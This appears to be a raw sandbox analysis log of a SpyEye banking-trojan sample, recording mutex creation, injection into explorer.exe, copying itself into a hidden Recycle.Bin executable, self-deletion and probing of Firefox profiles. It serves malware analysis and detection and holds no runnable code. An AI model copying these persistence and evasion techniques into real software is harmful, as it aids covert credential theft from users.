Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1990619531
Thread delayed Time: 0 TID: 13924 success or wait 1990619921
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1991010989
Thread delayed Time: 0 TID: 13924 success or wait 1991011361
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1991402628
Thread delayed Time: 0 TID: 13924 success or wait 1991402999
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1991794092
Thread delayed Time: 0 TID: 13924 success or wait 1991794467
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1992185549
Thread delayed Time: 0 TID: 13924 success or wait 1992186587
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1992576695
Thread delayed Time: 0 TID: 13924 success or wait 1992577194
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1992968317
Thread delayed Time: 0 TID: 13924 success or wait 1992968689
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1993359730
Thread delayed Time: 0 TID: 13924 success or wait 1993360101
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1993751410
Thread delayed Time: 0 TID: 13924 success or wait 1993751781
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1994143160
Thread delayed Time: 0 TID: 13924 success or wait 1994143534
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1994534651
Thread delayed Time: 0 TID: 13924 success or wait 1994535117
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1994926106
Thread delayed Time: 0 TID: 13924 success or wait 1994927181
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1995317590
Thread delayed Time: 0 TID: 13924 success or wait 1995317952
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1995709179
Thread delayed Time: 0 TID: 13924 success or wait 1995709542
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1996101970
Thread delayed Time: 0 TID: 13924 success or wait 1996102263
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1996492232
Thread delayed Time: 0 TID: 13924 success or wait 1996492606
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1996883675
Thread delayed Time: 0 TID: 13924 success or wait 1996884171
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1997275116
Thread delayed Time: 0 TID: 13924 success or wait 1997275562
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1997745910
Thread delayed Time: 0 TID: 13924 success or wait 1997754404
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1998114084
Thread delayed Time: 0 TID: 13924 success or wait 1998114455
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1998505716
Thread delayed Time: 0 TID: 13924 success or wait 1998506087
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1998900058
Thread delayed Time: 0 TID: 13924 success or wait 1998900432
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1999288706
Thread delayed Time: 0 TID: 13924 success or wait 1999289588
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1999680196
Thread delayed Time: 0 TID: 13924 success or wait 1999680653
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2000071713
Thread delayed Time: 0 TID: 13924 success or wait 2000072085
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2000467983
Thread delayed Time: 0 TID: 13924 success or wait 2000472222
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2002662056
Thread delayed Time: 0 TID: 13924 success or wait 2002662432
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2003360601
Thread delayed Time: 0 TID: 13924 success or wait 2003360975
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2003730181
Thread delayed Time: 0 TID: 13924 success or wait 2003731788
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2004155625
Thread delayed Time: 0 TID: 13924 success or wait 2004297182
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2004736136
Thread delayed Time: 0 TID: 13924 success or wait 2004738843
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2005179286
Thread delayed Time: 0 TID: 13924 success or wait 2005180977
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 2005732387
Thread delayed Time: 0 TID: 13924 success or wait 2005733393
Thread delayed Time: 0 TID: 13924 success or wait 2006296561
Thread delayed Time: 0 TID: 13924 success or wait 2006848816
Mutant created Name: \BaseNamedObjects\Global\System64 object name exists 2014624688
Process terminated PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe success or wait 2017169032
Analysis File: explorer.exe PID: 1636 Parent PID: 3660
+ Sections
+ General
Start time: 05:47:52
Start date: 01/12/2011
Path: C:\WINDOWS\explorer.exe
Commandline: C:\WINDOWS\Explorer.EXE
Imagebase: 0x1000000
File size: 1033728 bytes
MD5 hash: 12896823FB95BFB3DC9B46BCAEDC9923
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\wininet.dll synchronize and generic read synchronous io non alert and non directory file and random access success or wait 64 BAE1D35
C:\WINDOWS\system32\ntdll.dll read data or list directory and read ea and read attributes and synchronize synchronous io non alert and non directory file false success or wait 2 181083B
C:\Recycle.Bin\ read attributes and synchronize and generic write synchronous io non alert and non directory file false file is a directory 1 1810B14
C:\Recycle.Bin\ read attributes and synchronize and generic write synchronous io non alert and open for backup ident false success or wait 1 1810B14
C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 18106D9
C:\Recycle.Bin\B6232F3AC2C.exe read attributes and synchronize and generic write synchronous io non alert and non directory file false success or wait 2 1810B14
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 23 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BB74E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BB56A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 4 BB56A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BB56A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BB56A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BB56A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6346
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\profiles.ini read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BAF4E4E
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Recycle.Bin\ read data or list directory and synchronize normal directory file and synchronous io non alert and open for backup ident object name collision 1 18100EF
C:\Recycle.Bin\B6232F3AC2C.exe read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 1 1810B14
+ File deleted
File Path Completion Count Source Address
C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe cannot delete 5 181093C
C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe success or wait 1 181093C
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\B6232F3AC2C.exe none 254976 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 181066C
+ File read
File Path Offset Length Value Completion Count Source Address
C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe none 254976 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 1810764
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 23 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 23 BAD66D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 23 BAD6717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 23 BAD67A2
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BB6818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BB56699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BB566D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BB56717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BB567A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 4 BB56699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 4 BB566D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 4 BB56717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 4 BB567A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BB56699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BB566D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BB56717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BB567A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BB56699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BB566D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BB56717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BB567A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BB56699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BB566D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BB56717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BB567A2
C:\Recycle.Bin\07A49F015E0D693 none 4 03 12 C0 79 success or wait 1 BAD637F
C:\Recycle.Bin\B6232F3AC2C.exe none 254976 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 BAE818F
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\Recycle.Bin BasicInformation 00000000000000000000000000000000000000000000000000000000000000008200000000000000 success or wait 2 1810129
C:\Recycle.Bin\B6232F3AC2C.exe BasicInformation 00A013805E3CC601ECCB1BD32FB0CC0180FC04DEB397CB0100000000000000000000000000000000 success or wait 1 18108C4
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 92 BAD667A
C:\WINDOWS\system32\user32.dll PositionInformation Offset: 60 success or wait 4 BB5667A
C:\WINDOWS\system32\wininet.dll PositionInformation Offset: 60 success or wait 16 BB5667A
C:\WINDOWS\system32\ws2_32.dll PositionInformation Offset: 60 success or wait 4 BB5667A
C:\WINDOWS\system32\advapi32.dll PositionInformation Offset: 60 success or wait 4 BB5667A
C:\WINDOWS\system32\crypt32.dll PositionInformation Offset: 60 success or wait 4 BB5667A
C:\Recycle.Bin\07A49F015E0D693 PositionInformation Offset: 5930 success or wait 1 BAD6366
C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Ctrl code set: 110008 NU LL no status 0 BAE4F00
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
C:\Recycle.Bin\B6232F3AC2C.exe query and write and read and execute and extend size image BD0000 65536 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 2850000 1208320 own pid readonly success or wait 1
C:\Recycle.Bin\B6232F3AC2C.exe query and read commit 2130000 258048 own pid readonly success or wait 1
none query and write and read commit 1FC0000 16384 own pid read write success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 2950000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown 71A50000 258048 own pid read write object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 1F80000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown 76FB0000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
\KnownDlls\RASAPI32.dll write and read and execute unknown 2A10000 942080 own pid readonly object name not found 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown 76EE0000 245760 own pid read write object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown 76E90000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit 2950000 184320 own pid readonly success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown 2950000 184320 own pid readonly object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown 722B0000 20480 own pid read write object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown 71E50000 86016 own pid read write object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown 1FA0000 4096 own pid readonly success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown 1FA0000 4096 own pid readonly object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\digest.dll write and read and execute unknown 767F0000 163840 own pid read write object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown 75B00000 86016 own pid read write object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown 747B0000 290816 own pid read write object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit 2950000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
\KnownDlls\cryptdll.dll write and read and execute unknown 77C70000 151552 own pid read write object name not found 1
C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
\KnownDlls\MPRAPI.dll write and read and execute unknown 76790000 49152 own pid read write object name not found 1
C:\WINDOWS\system32\mprapi.dll query and write and read and execute image 76D40000 98304 own pid read write success or wait 1
\KnownDlls\ACTIVEDS.dll write and read and execute unknown 76D40000 98304 own pid read write object name not found 1
C:\WINDOWS\system32\activeds.dll query and write and read and execute image 77CC0000 204800 own pid read write success or wait 1
\KnownDlls\adsldpc.dll write and read and execute unknown 77CC0000 204800 own pid read write object name not found 1
C:\WINDOWS\system32\adsldpc.dll query and write and read and execute image 76E10000 151552 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown 76E10000 151552 own pid read write object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 2960000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1F70000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1F70000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
\KnownDlls\nspr4.dll write and read and execute unknown 1FC0000 65536 own pid readonly object name not found 1 BB71523
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\user32.dll query and read commit 1FC0000 57344 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit 1FC0000 20480 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1FC0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit 1FC0000 28672 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\crypt32.dll query and read commit 2950000 77824 own pid readonly success or wait 1 BB56A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1F70000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1F70000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\wininet.dll query and write and read and execute and extend size image 2A10000 942080 own pid readonly image not at base 1 BAE1D35
